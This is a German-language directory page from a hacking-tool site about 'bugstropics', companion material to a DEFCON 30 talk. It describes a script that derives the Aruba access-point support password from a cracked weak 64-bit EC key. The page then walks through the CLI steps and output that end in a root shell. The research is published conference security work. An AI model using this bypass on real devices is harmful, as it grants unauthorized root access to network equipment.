Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
bugstropics — Begleitmaterial zum DEFCON-30-Vortrag „Hunting Bugs In The Tropics" | Kitploit
Tools/GitHubGitHub/dozernz/bugstropics
Embedded-System-SicherheitPasswortangriffeSchwachstellenanalyseExploitationDrahtlose SicherheitKryptographieHardware- & IoT-Sicherheit
GitHubdozernz/bugstropics

bugstropics

Begleitmaterial zum DEFCON-30-Vortrag „Hunting Bugs In The Tropics"

Repository anzeigen
1277vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Jagd auf Bugs in den Tropen

Dies ist ein Repository mit den Folien, die in meinem Vortrag "Jagd auf Bugs in den Tropen" auf der DEFCON30 verwendet wurden. Es enthält das Python-Skript zur Berechnung des Support-Passworts auf Basis des privaten Schlüssels, der durch das Brechen des EC-öffentlichen Schlüssels des Aruba-Supports aufgrund seiner schwachen Größe (64 Bit) erlangt wurde. Damit kannst du aus der Subshell auf diesen Geräten ausbrechen und eine vollständige Root-Shell erhalten.

Du kannst es verwenden, indem du support auf der AP-CLI ausführst und einen beliebigen Benutzernamen angibst:

root@kitploit:~
# support
Username (Please enter with @domain.com, in lowercase): a

Token: ED14-B132-D4BB-D428
Please generate one time password at https://ase.arubanetworks.com/decode_aos_key
Support Password:

Übergib dann den Benutzernamen und den Token-Wert an das Skript support-access.py in diesem Repository.

root@kitploit:~
$ ./support-access.py a ED14-B132-D4BB-D428
Password: 4197d68283f73d5c

Füge die Antwort als Support-Passwort ein:

root@kitploit:~
Support Password: 4197d68283f73d5c
Switching to Full Access
~ # whoami
root
Tool herunterladen